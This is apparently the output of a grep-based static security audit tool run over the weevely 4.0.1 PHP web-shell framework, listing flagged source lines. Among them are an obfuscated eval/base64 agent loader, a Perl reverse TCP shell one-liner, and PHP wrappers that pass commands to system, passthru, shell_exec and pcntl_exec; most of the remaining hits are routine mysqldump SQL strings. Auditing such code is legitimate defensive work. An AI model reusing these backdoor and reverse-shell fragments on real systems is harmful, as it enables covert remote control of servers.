=========================================================== .___ __ __ _________________ __ __ __| _/|__|/ |_ / ___\_` __ \__ \ | | \/ __ | | \\_ __\ / /_/ > | \// __ \| | / /_/ | | || | \___ /|__| (____ /____/\____ | |__||__| /_____/ \/ \/ grep rough audit - static analysis tool v2.8 written by @Wireghoul =================================[justanotherhacker.com]=== weevely-4.0.1/bd/agents/obfpost_php.tpl-21-@ob_start(); weevely-4.0.1/bd/agents/obfpost_php.tpl:22:@eval(@gzuncompress(@x(@base64_decode($m[1]),$k))); weevely-4.0.1/bd/agents/obfpost_php.tpl-23-$o=@ob_get_contents(); ############################################## weevely-4.0.1/modules/backdoor/reversetcp.py-49- ShellCmd( weevely-4.0.1/modules/backdoor/reversetcp.py:50: """perl -e 'use Socket;$i="${lhost}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("${shell} -i");};'""", weevely-4.0.1/modules/backdoor/reversetcp.py-51- name = 'perl', ############################################## weevely-4.0.1/modules/net/_curl/php_curl.tpl-35-curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); weevely-4.0.1/modules/net/_curl/php_curl.tpl:36:$response = curl_exec($ch); weevely-4.0.1/modules/net/_curl/php_curl.tpl-37-print($response); ############################################## weevely-4.0.1/modules/net/_phpproxy/poxy.php-356- ?> weevely-4.0.1/modules/net/_phpproxy/poxy.php:357: <form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>"> weevely-4.0.1/modules/net/_phpproxy/poxy.php-358- <ul id="form"> ############################################## weevely-4.0.1/modules/shell/sh.py-26- # All the system-like calls has to be properly wrapped between single quotes weevely-4.0.1/modules/shell/sh.py:27: PhpCode("""@system('${command}${stderr_redirection}');""", "system"), weevely-4.0.1/modules/shell/sh.py:28: PhpCode("""@passthru('${command}${stderr_redirection}');""", "passthru"), weevely-4.0.1/modules/shell/sh.py:29: PhpCode("""print(@shell_exec('${command}${stderr_redirection}'));""", "shell_exec"), weevely-4.0.1/modules/shell/sh.py:30: PhpCode("""$r=array(); @exec('${command}${stderr_redirection}', $r);print(join(\"\\n\",$r));""", "exec"), weevely-4.0.1/modules/shell/sh.py-31- PhpCode(""" weevely-4.0.1/modules/shell/sh.py:32: $h=@popen('${command}','r'); weevely-4.0.1/modules/shell/sh.py-33- if($h){ ############################################## weevely-4.0.1/modules/shell/sh.py-47- }""", "proc_open"), weevely-4.0.1/modules/shell/sh.py:48: PhpCode("""@python_eval('import os; os.system('${command}${stderr_redirection}');');""", "python_eval"), weevely-4.0.1/modules/shell/sh.py-49- PhpCode(""" ############################################## weevely-4.0.1/modules/shell/sh.py-51- $perl=new Perl(); weevely-4.0.1/modules/shell/sh.py:52: $r=$perl->system('${command}${stderr_redirection}'); weevely-4.0.1/modules/shell/sh.py-53- print($r); ############################################## weevely-4.0.1/modules/shell/sh.py-59- if(!$p){ weevely-4.0.1/modules/shell/sh.py:60: @pcntl_exec("/bin/sh",Array("-c",'${command}')); weevely-4.0.1/modules/shell/sh.py-61- } else { ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-424- $ret = "--" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:425: "-- Table structure for table `$tableName`" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-426- "--" . PHP_EOL . PHP_EOL; ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-469- $ret = "--" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:470: "-- Table structure for view `${viewName}`" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-471- "--" . PHP_EOL . PHP_EOL; ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-555- $colStmt = $this->getColumnStmt($tableName); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:556: $stmt = "SELECT $colStmt FROM `$tableName`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-557- ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-567- $lineSize += $this->compressManager->write( weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:568: "INSERT INTO `$tableName` VALUES (" . implode(",", $vals) . ")" weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-569- ); ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-599- "--" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:600: "-- Dumping data for table `$tableName`" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-601- "--" . PHP_EOL . PHP_EOL ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-604- if ($this->dumpSettings['single-transaction']) { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:605: $this->dbHandler->exec($this->typeAdapter->start_transaction()); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-606- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-655- if ($this->dumpSettings['single-transaction']) { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:656: $this->dbHandler->exec($this->typeAdapter->commit_transaction()); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-657- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-686- if ($colType['type'] == 'bit' && $this->dumpSettings['hex-blob']) { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:687: $colStmt[] = "LPAD(HEX(`${colName}`),2,'0') AS `${colName}`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-688- } else if ($colType['is_blob'] && $this->dumpSettings['hex-blob']) { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:689: $colStmt[] = "HEX(`${colName}`) AS `${colName}`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-690- } else { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:691: $colStmt[] = "`${colName}`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-692- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-892- "FROM sqlite_master " . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:893: "WHERE type='table' AND tbl_name='$tableName'"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-894- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-908- "FROM sqlite_master " . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:909: "WHERE type='view' AND tbl_name='$viewName'"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-910- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1124- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1125: $ret .= "CREATE DATABASE /*!32312 IF NOT EXISTS*/ `${databaseName}`". weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1126- " /*!40100 DEFAULT CHARACTER SET ${characterSet} " . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1127- " COLLATE ${collationDb} */;" . PHP_EOL . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1128: "USE `${databaseName}`;" . PHP_EOL . PHP_EOL; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1129- ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1134- { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1135: return "SHOW CREATE TABLE `$tableName`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1136- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1139- { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1140: return "SHOW CREATE VIEW `$viewName`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1141- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1144- { weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1145: return "SHOW CREATE TRIGGER `$triggerName`"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1146- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1234- "FROM INFORMATION_SCHEMA.TABLES " . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1235: "WHERE TABLE_TYPE='BASE TABLE' AND TABLE_SCHEMA='${args[0]}'"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1236- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1247- "FROM INFORMATION_SCHEMA.TABLES " . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1248: "WHERE TABLE_TYPE='VIEW' AND TABLE_SCHEMA='${args[0]}'"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1249- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1258- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1259: return "SHOW TRIGGERS FROM `${args[0]}`;"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1260- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1270- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1271: return "SHOW COLUMNS FROM `${args[0]}`;"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1272- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1292- //$tableName = $args[0]; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1293: //return "LOCK TABLES `$tableName` READ LOCAL"; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1294: return $this->dbHandler->exec("LOCK TABLES `${args[0]}` READ LOCAL"); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1295- ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1310- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1311: return "LOCK TABLES `${args[0]}` WRITE;" . PHP_EOL; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1312- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1324- $args = func_get_args(); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1325: return "/*!40000 ALTER TABLE `${args[0]}` DISABLE KEYS */;" . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1326- PHP_EOL; ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1334- $args = func_get_args(); weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1335: return "/*!40000 ALTER TABLE `${args[0]}` ENABLE KEYS */;" . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1336- PHP_EOL; ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1356- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1357: return "/*!40000 DROP DATABASE IF EXISTS `${args[0]}`*/;" . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1358- PHP_EOL . PHP_EOL; ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1368- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1369: return "DROP TRIGGER IF EXISTS `${args[0]}`;" . PHP_EOL; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1370- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1379- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1380: return "DROP TABLE IF EXISTS `${args[0]}`;" . PHP_EOL; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1381- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1390- weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1391: return "DROP TABLE IF EXISTS `${args[0]}`;" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1392: "/*!50001 DROP VIEW IF EXISTS `${args[0]}`*/;" . PHP_EOL; weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1393- } ############################################## weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1403- return "--" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl:1404: "-- Current Database: `${args[0]}`" . PHP_EOL . weevely-4.0.1/modules/sql/_dump/mysqldump.tpl-1405- "--" . PHP_EOL . PHP_EOL;